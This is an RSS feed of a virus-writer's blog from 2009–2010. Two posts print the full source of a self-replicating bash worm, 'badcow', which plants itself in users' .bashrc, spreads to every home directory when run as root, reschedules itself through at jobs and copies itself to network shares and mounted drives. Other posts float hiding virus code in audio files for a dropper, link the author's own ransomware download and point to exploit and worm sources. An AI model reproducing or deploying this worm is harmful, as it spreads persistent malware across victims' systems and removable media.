<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>WarGame's Blog</title>
	<atom:link href="http://vx.org.ua/wargamevx/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://vx.org.ua/wargamevx</link>
	<description></description>
	<lastBuildDate>Mon, 29 Mar 2010 19:11:22 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>&#8230;</title>
		<link>http://vx.org.ua/wargamevx/?p=86</link>
		<comments>http://vx.org.ua/wargamevx/?p=86#comments</comments>
		<pubDate>Mon, 29 Mar 2010 19:11:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[All days]]></category>

		<guid isPermaLink="false">http://vx.org.ua/wargamevx/?p=86</guid>
		<description><![CDATA[Still alive&#8230;
]]></description>
			<content:encoded><![CDATA[<p>Still alive&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://vx.org.ua/wargamevx/?feed=rss2&amp;p=86</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Hide virus in sounds &#8230;</title>
		<link>http://vx.org.ua/wargamevx/?p=85</link>
		<comments>http://vx.org.ua/wargamevx/?p=85#comments</comments>
		<pubDate>Sat, 02 Jan 2010 22:43:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[All days]]></category>

		<guid isPermaLink="false">http://vx.org.ua/wargamevx/?p=85</guid>
		<description><![CDATA[I have just discovered a nice tool called arss that allows you to play with spectrogram of sound signals.
It would be very cool to use this for vx stuff.
You could for example hide the virus code in the spectrum of an audio file so the virus can be stored in an http server and then [...]]]></description>
			<content:encoded><![CDATA[<p>I have just discovered a nice tool called <a href="http://arss.sourceforge.net/">arss</a> that allows you to play with <a href="http://en.wikipedia.org/wiki/Spectrogram">spectrogram</a> of sound signals.<br />
It would be very cool to use this for vx stuff.<br />
You could for example hide the virus code in the spectrum of an audio file so the virus can be stored in an http server and then downloaded (and extracted) using a dropper to the host system &#8230;<br />
There is no suspect traffic in this way</p>
]]></content:encoded>
			<wfw:commentRss>http://vx.org.ua/wargamevx/?feed=rss2&amp;p=85</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Bash scripting 2</title>
		<link>http://vx.org.ua/wargamevx/?p=84</link>
		<comments>http://vx.org.ua/wargamevx/?p=84#comments</comments>
		<pubDate>Fri, 01 Jan 2010 19:27:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[All days]]></category>

		<guid isPermaLink="false">http://vx.org.ua/wargamevx/?p=84</guid>
		<description><![CDATA[I have improved a bit the bash worm, now it uses gvfs features too.

#!/bin/bash
# the badcow by WarGame
if [ ! -f "$HOME/.badcow.sh" ];
then
	echo $HOME/.badcow.sh >> $HOME/.bashrc
fi
cp $0 $HOME/.badcow.sh > /dev/null 2>&#038;1
chmod +x $HOME/.badcow.sh > /dev/null 2>&#038;1
if [ "$(id -u)" = "0" ];
then
	for dr_home in `ls /home`
	do
		if [ -d "/home/$dr_home" ];
		then
			if [ ! -f "/home/$dr_home/.badcow.sh" ];
			then
				echo [...]]]></description>
			<content:encoded><![CDATA[<p>I have improved a bit the bash worm, now it uses <a href="http://en.wikipedia.org/wiki/GVFS">gvfs</a> features too.</p>
<p><code><br />
#!/bin/bash</p>
<p># the badcow by WarGame</p>
<p>if [ ! -f "$HOME/.badcow.sh" ];<br />
then<br />
	echo $HOME/.badcow.sh >> $HOME/.bashrc<br />
fi</p>
<p>cp $0 $HOME/.badcow.sh > /dev/null 2>&#038;1<br />
chmod +x $HOME/.badcow.sh > /dev/null 2>&#038;1</p>
<p>if [ "$(id -u)" = "0" ];<br />
then<br />
	for dr_home in `ls /home`<br />
	do<br />
		if [ -d "/home/$dr_home" ];<br />
		then<br />
			if [ ! -f "/home/$dr_home/.badcow.sh" ];<br />
			then<br />
				echo /home/$dr_home/.badcow.sh >> /home/$dr_home/.bashrc<br />
			fi</p>
<p>			cp $HOME/.badcow.sh /home/$dr_home/.badcow.sh > /dev/null 2>&#038;1<br />
			chmod 0755 /home/$dr_home/.badcow.sh > /dev/null 2>&#038;1<br />
			chmod +x /home/$dr_home/.badcow.sh > /dev/null 2>&#038;1</p>
<p>		fi<br />
	done</p>
<p>	exit 0<br />
fi</p>
<p>if [ -d "$HOME/.gvfs" ]; # try to spread using the gnome virtual filesystem<br />
then<br />
	for vfs in `ls $HOME/.gvfs`<br />
	do<br />
		if [ -d "$HOME/.gvfs/$vfs" ];<br />
		then<br />
			cp $HOME/.badcow.sh $HOME/.gvfs/$vfs/badcow.sh > /dev/null 2>&#038;1<br />
			chmod +x $HOME/.gvfs/$vfs/badcow.sh > /dev/null 2>&#038;1<br />
		fi<br />
	done<br />
fi</p>
<p>for job in $(atq | awk '{print $1}' )<br />
do<br />
	atrm $job > /dev/null 2>&#038;1<br />
done</p>
<p>at now + 10 minutes -f $HOME/.badcow.sh > /dev/null 2>&#038;1</p>
<p>for dr in $(mount | awk '{print $3}' ) # try to copy itself in mounted drives<br />
do<br />
	if [ -d "$dr" ];<br />
	then<br />
		cp $HOME/.badcow.sh $dr/badcow.sh > /dev/null 2>&#038;1<br />
		chmod +x $dr/badcow.sh > /dev/null 2>&#038;1<br />
	fi<br />
done<br />
</code></p>
]]></content:encoded>
			<wfw:commentRss>http://vx.org.ua/wargamevx/?feed=rss2&amp;p=84</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Bash scripting &#8230;</title>
		<link>http://vx.org.ua/wargamevx/?p=83</link>
		<comments>http://vx.org.ua/wargamevx/?p=83#comments</comments>
		<pubDate>Wed, 30 Dec 2009 14:12:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[All days]]></category>

		<guid isPermaLink="false">http://vx.org.ua/wargamevx/?p=83</guid>
		<description><![CDATA[I have just entered in the world of bash scripting and this is my first experiment in this language:

#!/bin/bash
# the badcow
if [ ! -f "$HOME/.badcow.sh" ];
then
	echo $HOME/.badcow.sh >> $HOME/.bashrc
fi
cp $0 $HOME/.badcow.sh > /dev/null 2>&#038;1
chmod +x $HOME/.badcow.sh > /dev/null 2>&#038;1
if [ "$(id -u)" = "0" ];
then
	for dr_home in `ls /home`
	do
		if [ -d /home/$dr_home ];
		then
			if [ ! [...]]]></description>
			<content:encoded><![CDATA[<p>I have just entered in the world of bash scripting and this is my first experiment in this language:<br />
<code><br />
#!/bin/bash</p>
<p># the badcow</p>
<p>if [ ! -f "$HOME/.badcow.sh" ];<br />
then<br />
	echo $HOME/.badcow.sh >> $HOME/.bashrc<br />
fi</p>
<p>cp $0 $HOME/.badcow.sh > /dev/null 2>&#038;1<br />
chmod +x $HOME/.badcow.sh > /dev/null 2>&#038;1</p>
<p>if [ "$(id -u)" = "0" ];<br />
then<br />
	for dr_home in `ls /home`<br />
	do<br />
		if [ -d /home/$dr_home ];<br />
		then<br />
			if [ ! -f "/home/$dr_home/.badcow.sh" ];<br />
			then<br />
				echo /home/$dr_home/.badcow.sh >> /home/$dr_home/.bashrc<br />
			fi</p>
<p>			cp $HOME/.badcow.sh /home/$dr_home/.badcow.sh > /dev/null 2>&#038;1<br />
			chmod 0755 /home/$dr_home/.badcow.sh > /dev/null 2>&#038;1<br />
			chmod +x /home/$dr_home/.badcow.sh > /dev/null 2>&#038;1</p>
<p>		fi<br />
	done</p>
<p>	exit 0<br />
fi</p>
<p>for job in $(atq | awk '{print $1}' )<br />
do<br />
	atrm $job > /dev/null 2>&#038;1<br />
done</p>
<p>at now + 10 minutes -f $HOME/.badcow.sh > /dev/null 2>&#038;1</p>
<p>for dr in $(mount | awk '{print $3}' )<br />
do<br />
	if [ -d $dr ];<br />
	then<br />
		cp $HOME/.badcow.sh $dr/badcow.sh > /dev/null 2>&#038;1<br />
		chmod +x $dr/badcow.sh > /dev/null 2>&#038;1<br />
	fi<br />
done<br />
</code></p>
<p>It is a simple example of worm spreading via removable media under linux (even if it works on FreeBSD too) &#8230; it&#8217;s not very powerful because there is no autorun feature under unix so it needs to be executed by the user</p>
]]></content:encoded>
			<wfw:commentRss>http://vx.org.ua/wargamevx/?feed=rss2&amp;p=83</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Wordpress remote admin password vulnerability</title>
		<link>http://vx.org.ua/wargamevx/?p=81</link>
		<comments>http://vx.org.ua/wargamevx/?p=81#comments</comments>
		<pubDate>Wed, 12 Aug 2009 12:09:40 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[All days]]></category>

		<guid isPermaLink="false">http://vx.org.ua/wargamevx/?p=81</guid>
		<description><![CDATA[A very nasty exploit for wordpress is out so if you are running a vulnerable version of it run to fix the bug!
Here the exploit.
This is the fix.
]]></description>
			<content:encoded><![CDATA[<p>A very nasty exploit for wordpress is out so if you are running a vulnerable version of it run to fix the bug!<br />
<a href="http://www.milw0rm.org/exploits/9410">Here</a> the exploit.<br />
This is the <a href="http://core.trac.wordpress.org/changeset/11798">fix</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://vx.org.ua/wargamevx/?feed=rss2&amp;p=81</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Files for Ransom &#8230; or Not</title>
		<link>http://vx.org.ua/wargamevx/?p=80</link>
		<comments>http://vx.org.ua/wargamevx/?p=80#comments</comments>
		<pubDate>Fri, 24 Jul 2009 12:04:46 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[All days]]></category>

		<guid isPermaLink="false">http://vx.org.ua/wargamevx/?p=80</guid>
		<description><![CDATA[I have just found this post on trendmicro blog, it is about my RansomWar. The funny thing is that I published it a lot of time ago &#8230; 
]]></description>
			<content:encoded><![CDATA[<p>I have just found <a href="http://blog.trendmicro.com/files-for-ransom%e2%80%a6-or-not/">this</a> post on trendmicro blog, it is about my <a href="stuff/RansomWar.zip">RansomWar</a>. The funny thing is that I published it a lot of time ago &#8230; </p>
]]></content:encoded>
			<wfw:commentRss>http://vx.org.ua/wargamevx/?feed=rss2&amp;p=80</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>An old skool exploit :D</title>
		<link>http://vx.org.ua/wargamevx/?p=79</link>
		<comments>http://vx.org.ua/wargamevx/?p=79#comments</comments>
		<pubDate>Mon, 20 Jul 2009 22:37:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[All days]]></category>

		<guid isPermaLink="false">http://vx.org.ua/wargamevx/?p=79</guid>
		<description><![CDATA[
]]></description>
			<content:encoded><![CDATA[<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/UhDcXCVFrvM&#038;hl=en&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/UhDcXCVFrvM&#038;hl=en&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://vx.org.ua/wargamevx/?feed=rss2&amp;p=79</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Origami in PDF</title>
		<link>http://vx.org.ua/wargamevx/?p=78</link>
		<comments>http://vx.org.ua/wargamevx/?p=78#comments</comments>
		<pubDate>Sat, 11 Jul 2009 20:15:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[All days]]></category>

		<guid isPermaLink="false">http://vx.org.ua/wargamevx/?p=78</guid>
		<description><![CDATA[
Origami is a tool that let you insert javascript code inside pdf documents and do other nice things.
PDF format can be abused a lot! (as recent attacks say) 
]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.humaniter.org/public/origami4_536.jpg" alt="origami" /></br><br />
<a href="http://security-labs.org/origami/">Origami</a> is a tool that let you insert javascript code inside pdf documents and do other nice things.<br />
PDF format can be abused a lot! (as recent attacks say) </p>
]]></content:encoded>
			<wfw:commentRss>http://vx.org.ua/wargamevx/?feed=rss2&amp;p=78</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Persistent bios infection</title>
		<link>http://vx.org.ua/wargamevx/?p=77</link>
		<comments>http://vx.org.ua/wargamevx/?p=77#comments</comments>
		<pubDate>Sun, 14 Jun 2009 16:46:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[All days]]></category>

		<guid isPermaLink="false">http://vx.org.ua/wargamevx/?p=77</guid>
		<description><![CDATA[Phrack#66 is out and it contains a very nice article about injecting your own code in the BIOS eeprom.
You can read it here.
]]></description>
			<content:encoded><![CDATA[<p>Phrack#66 is out and it contains a very nice article about injecting your own code in the BIOS eeprom.<br />
You can read it <a href="http://www.phrack.com/issues.html?issue=66&#038;id=7#article">here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://vx.org.ua/wargamevx/?feed=rss2&amp;p=77</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Yet an other XSS worm</title>
		<link>http://vx.org.ua/wargamevx/?p=76</link>
		<comments>http://vx.org.ua/wargamevx/?p=76#comments</comments>
		<pubDate>Mon, 13 Apr 2009 20:14:11 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[All days]]></category>

		<guid isPermaLink="false">http://vx.org.ua/wargamevx/?p=76</guid>
		<description><![CDATA[It seems that a XSS worm is spreading among twitter users &#8230; here more details.
You can find the src code of the worm here.
]]></description>
			<content:encoded><![CDATA[<p>It seems that a XSS worm is spreading among twitter users &#8230; <a href="http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/">here</a> more details.<br />
You can find the src code of the worm <a href="http://gist.github.com/93782">here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://vx.org.ua/wargamevx/?feed=rss2&amp;p=76</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
